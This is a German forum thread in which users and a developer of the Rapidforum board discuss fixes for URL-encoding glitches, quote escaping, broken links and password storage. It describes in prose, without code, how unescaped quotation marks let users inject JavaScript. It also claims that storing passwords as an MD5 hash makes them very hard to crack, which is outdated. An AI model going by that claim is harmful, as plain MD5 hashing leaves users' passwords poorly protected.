BTW: Die Rückwandlung funktioniert auch nicht. Alles voller Sonderzeichen:
demn%E4chst%20Jura
http%3A//
www.sternenvolk.de/cgi-bin/avatare/avatar.jpg%22%22
so habe nochmal was gefixed. bitte mal testen ;)
auch mal schauen was passiert, wenn man " und ' benutzt. die sollten jetzt gequoted werden.
Kewl. Würde sagen das funktioniert jetzt rundum. Dragony, dass der Grund warum ich so gerne bei Rapidforum bin. Klasse Support. Weiter so!
Öhm. Moment. [img]
http://www.fb18.de/gfx/15.gif[/img] Ich weiß ja nicht ob das miteinander zusammenhängt. Aber man möge mal probieren, auf "neue Beiträge?" oder "Mitglieder-Verzeichnis" zu klicken…
*g* ja das ist die andere Sache, an der ich grade arbeite ;) ist schon gefixed.
Und plötzlich wird beim Profil auch der Avatar korrekt angezeigt.
Kewl.
[img]
http://www.fb18.de/gfx/23.gif[/img]
Jetzt wird ein MD5-Hash gespeichert, der wohl nur noch sehr schwer zu hacken sein wird.
MD5 klingt schonmal gut.
Jedoch frage ich mich, wie ein User an PAsswörter kommen soll? Das kann doch nur der Admin des Forums, da ein User den JAvaScript nicht einschleusen kann (es sei denn, der Admin erlaubt HTML, was sowieso unklug wäre)
Wie unten demonstriert reicht es ja nicht aus, HTML zu verbieten - es reicht schon aus, wenn der User Anfuehrungszeichen eingeben kann, um eben doch JavaScript einzuschleusen.
Sinnvollstes Posting? [img]
http://www.fb18.de/gfx/15.gif[/img]
